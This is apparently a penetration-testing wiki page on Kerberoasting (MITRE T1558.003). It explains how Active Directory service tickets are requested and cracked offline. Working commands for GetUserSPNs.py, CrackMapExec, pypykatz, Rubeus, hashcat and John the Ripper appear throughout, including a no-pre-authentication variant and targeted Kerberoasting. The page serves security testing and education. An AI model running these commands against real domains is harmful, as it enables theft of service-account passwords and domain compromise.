Kerberoast
MITRE ATT&CK™ Sub-technique T1558.003

Theory

When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the SPN (Service Principal Name) of the service wanted. If the TGT is valid, and if the SPN exists, the KDC sends the ST to the requesting user.
The ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a SPN for a service, he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.
In most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting.

Practice

Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials), except in the Kerberoasting without pre-authentication scenario.
UNIX-like
Windows
The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.
you can perform the Kerberoasting attack without knowing any SPN of the target account. But the existence of at least one SPN for the target account will continue to be needed.
# with a password
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
​
# with an NT hash
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
This can also be achieved with CrackMapExec (Python).
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
Using pypykatz (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack $krb5tgs$23 takes less time than for krb5tgs$18.
pypykatz kerberos spnroast -d $DOMAIN -t $TARGET_USER -e 23 'kerberos+password://DOMAIN\username:[email protected]'
​Rubeus (C#) can be used for that purpose.
Rubeus.exe kerberoast /outfile:kerberoastables.txt
​Hashcat and JohnTheRipper can then be used to try cracking the hash.
hashcat -m 13100 kerberoastables.txt $wordlist
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt

Kerberoast w/o pre-authentication

In September 2022, Charlie Cark explained how Service Tickets could be obtained through AS-REQ requests (which are usually used for TGT requests), instead of the usual TGS-REQ. He demonstrated (and implemented) how to abuse this in a Kerberoasting scenario.
If an attacker knows of an account for which pre-authentication isn't required (i.e. an ASREProastable account), as well as one (or multiple) service accounts to target, a Kerberoast attack can be attempted without having to control any Active Directory (since pre-authentication won't be required).
UNIX-like
Windows
The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN (or name) and valid domain credentials.
At the time of writing, Sept. 28th 2022, the pull request (#1413) adding the -no-preauth option for GetUserSPNs.py is pending.
GetUserSPNs.py -no-preauth "bobby" -usersfile "services.txt" -dc-host "DC_IP_or_HOST" "DOMAIN.LOCAL"/
usersfile example
1
srv01
2
cifs/srv02.domain.local
3
cifs/srv02
​Rubeus (C#) can be used for that purpose.
At the time of writing, Sept. 28th 2022, the pull request (#139) adding the /nopreauth option for Rubeus' kerberoast command is pending.
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"DOMAIN.LOCAL" /dc:"DC01.DOMAIN.LOCAL" /nopreauth:"nopreauth_user" /spn:"target_service"

Targeted Kerberoasting

If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).
Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation).

Resources

Kerberos in Active Directory
hackndo
How Attackers Use Kerberos Silver Tickets to Exploit Systems
Active Directory Security
New Attack Paths? AS Requested Service Tickets | Semperis
Semperis
Copy link
On this page
Theory
Practice
Kerberoast w/o pre-authentication
Targeted Kerberoasting
Resources